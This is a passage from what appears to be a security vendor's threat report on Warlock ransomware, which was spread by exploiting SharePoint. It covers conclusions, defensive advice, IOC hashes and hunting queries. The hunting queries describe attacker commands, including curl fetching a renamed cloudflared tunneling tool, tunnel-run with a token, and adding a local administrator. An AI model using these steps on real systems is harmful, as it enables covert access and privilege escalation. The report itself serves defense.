Both cases illustrate LockBit 3.0’s continued use of DLL sideloading through legitimate executables to evade detection and achieve execution within compromised systems.
We identified another infection containing two different extensions — one being the same as the previously noted extension, while the other being an “.xlockxlock” extension.
Furthermore, we have also externally sourced an MSI file that contains the ransomware components, indicating that it may be delivered using the installer package.
Conclusion
The Warlock ransomware attack provides a case study in the speed and depth with which adversaries can compromise unpatched enterprise environments. By exploiting SharePoint’s authentication and deserialization flaws, attackers were able to rapidly gain code execution capabilities and escalated privileges, move laterally within the system, and deliver disruptive ransomware at scale. Each phase—from web shell deployment and key extraction to credential theft and data exfiltration—underscores the urgent need for holistic patching, network defense, and layered detection capabilities.
To defend against Warlock ransomware and similar threats, organizations should promptly patch their on-premises SharePoint servers. In addition to Microsoft’s security updates, Trend has released targeted updates, proactive detection rules, and network filters that can help block exploitation attempts, along with investigative tools that enable customers to assess their potential exposure to these vulnerabilities. We also recommend watching the webinar Dealing with the fallout of a failed SharePoint patch: Are you protected?, which offers practical advice on protection and recovery. The complete list of available solutions can be found in our knowledge base entry.
Organizations should actively monitor suspicious account activity or policy changes, restrict access to administrative shares, and promptly flag abnormal script or command executions. They should also detect and respond to attempts to disable security tools, block unauthorized service or driver installations, and identify signs of lateral movement, credential dumping, or unexpected RDP configuration changes. Continuous monitoring for protocol tunneling, command-and-control activity, and data exfiltration through renamed or disguised tools is essential. Maintaining up-to-date security signatures, conducting regular threat sweeps with Trend Vision One™, and reinforcing defenses through strong user awareness programs and tested incident response plans are critical components of an effective security posture.
Proactive security with Trend Vision One™
Trend Vision One️™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection. This holistic approach helps enterprises predict and prevent threats, accelerating proactive security outcomes across their respective digital estate. With Trend Vision One, you’re enabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for innovation, especially in the cases of novel ransomware variants as in the one discussed in this blog.
Trend Vision One ™ Threat Intelligence
To stay ahead of evolving threats, Trend customers can access Trend Vision One™ Threat Insights which provides the latest insights from Trend ™ Research on emerging threats and threat actors.
Trend Vision One Threat Insights
Trend Vision One Intelligence Reports (IOC Sweeping)
Hunting Queries
Trend Vision One Search App
Trend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.
Detection Query for Warlock with KillAV
(malName:WARLOCK AND malName:KILLAV) AND eventName:MALWARE_DETECTION
Microsoft SharePoint Server Vulnerability Exploitation
tags: XSAE.F2555
Domain Trusts Discovery Commands via Nltest from Exploited Sharepoint server
tags: XSAE.F1842 AND parentCmd: (w3wp.exe AND -ap AND SharePoint)
Downloading of Renamed Cloudflare Tunneling Tool
objectCmd: curl.exe AND -L AND -o AND objectCmd: macfee_agent.exe*GitHub.com*cloudflared-windows-amd64*
Service elevation of renamed cloudflare binary
eventSubId: 402 AND objectRegistryKeyHandle: cloudflared AND objectRegistryData: *hpmews03.exe*tunnel run*–token*
Suspicious adding of new user in administrator group from exploited sharepoint server
parentCmd: (w3wp.exe AND -ap AND sharepoint) AND objectCmd: localgroup administrators*/add
More hunting queries are available for Trend Vision One customers with Threat Insights Entitlement enabled .
Indicators of Compromise
| 0bbbf2a9d49152ac6ad755167ccb0f2b4f00b976 | Ransom.Win32.WARLOCK.A.note |
| cf0da7f6450f09c8958e253bd606b83aa80558f2 | Ransom.Win32.WARLOCK.A |
| 8b13118b378293b9dc891b57121113d0aea3ac8a | Ransom.Win32.WARLOCK.A |
| 0488509b4dbc16dcb6d5f531e3c8b9a59b69e522 | Trojan.Win64.KILLAV.I |
With additional analysis from Maristel Policarpio, Sarah Pearl Camiling, Jacob Santos, Don Ladores
